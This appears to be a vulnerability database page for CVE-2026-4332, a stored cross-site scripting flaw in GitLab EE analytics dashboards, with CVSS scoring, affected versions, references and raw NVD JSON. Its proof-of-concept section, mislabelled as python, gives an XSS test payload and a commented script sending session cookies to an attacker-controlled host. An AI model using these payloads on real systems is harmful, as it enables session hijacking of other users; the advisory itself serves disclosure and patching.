CVE-2026-4332

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that, in customizable analytics dashboards, could have allowed an authenticated user to execute arbitrary JavaScript in the context of other users' browsers due to improper input sanitization.

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* - VULNERABLE

GitLab EE 18.2 至 18.8.9 之前

GitLab EE 18.9 至 18.9.5 之前

GitLab EE 18.10 至 18.10.3 之前

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2026-4332
// Usage: Inject the payload into a customizable analytics dashboard field.

// Payload 1: Basic alert to verify vulnerability
<img src=x onerror=alert('CVE-2026-4332_XSS_Executed')>

// Payload 2: Steal session cookies (for educational testing purposes)
// <script>
//   var i = new Image();
//   i.src = 'http://attacker-controlled-server.com/steal?cookie=' + document.cookie;
// </script>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4332
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4332
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4332/
[4] VulDB https://vuldb.com/cve/CVE-2026-4332
[5] https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/593853
[7] https://hackerone.com/reports/3600345

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4332", "sourceIdentifier": "[email protected]", "published": "2026-04-08T23:16:59.683", "lastModified": "2026-04-16T13:00:20.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that, in customizable analytics dashboards, could have allowed an authenticated user to execute arbitrary JavaScript in the context of other users' browsers due to improper input sanitization."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.2.0", "versionEndExcluding": "18.8.9", "matchCriteriaId": "CFAD5EB0-9700-4C16-AEF0-27599F84541F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "3BA6A89D-D2C1-45B9-A8E8-64256816D880"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "BB2F3665-2451-4A4D-8538-93F540975F0E"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/593853", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3600345", "source": "[email protected]", "tags": ["Permissions Required"]}]}}